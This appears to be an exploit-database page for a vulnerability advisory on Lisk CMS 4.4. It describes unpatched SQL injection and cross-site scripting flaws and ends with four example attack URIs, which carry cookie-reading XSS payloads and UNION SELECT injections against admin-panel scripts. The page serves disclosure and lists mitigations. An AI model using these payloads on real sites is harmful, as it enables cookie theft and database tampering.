header-logo
Suggest Exploit
vendor:
Lisk CMS
by:
7.5
CVSS
HIGH
SQL Injection, Cross-Site Scripting
89, 79
CWE
Product Name: Lisk CMS
Affected Version From: 4.4
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Lisk CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities

Lisk CMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Sanitize user-supplied input to prevent SQL injection and cross-site scripting attacks. Use parameterized queries or prepared statements to handle user input safely. Regularly update Lisk CMS to the latest version to patch any existing vulnerabilities.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/40314/info

Lisk CMS is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Lisk CMS 4.4 is vulnerable; other versions may also be affected. 

The following example URIs are available:

http://www.example.com/path_to_cp/list_content.php?cl=2%27%22%3E%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
http://www.example.com/path_to_cp/edit_email.php?&id=contact_form_214%27+--+%3Cimg+src=x+onerror=alert%28document.cookie%29%3E
http://www.example.com/path_to_cp/cp_messages.php?action=view_inbox&id=-1+union+select+1,2,3,4,5,6,7,8,9+--+
http://www.example.com/path_to_cp/edit_email.php?&id=X%27+union+select+1,2,3,4,5,6+--+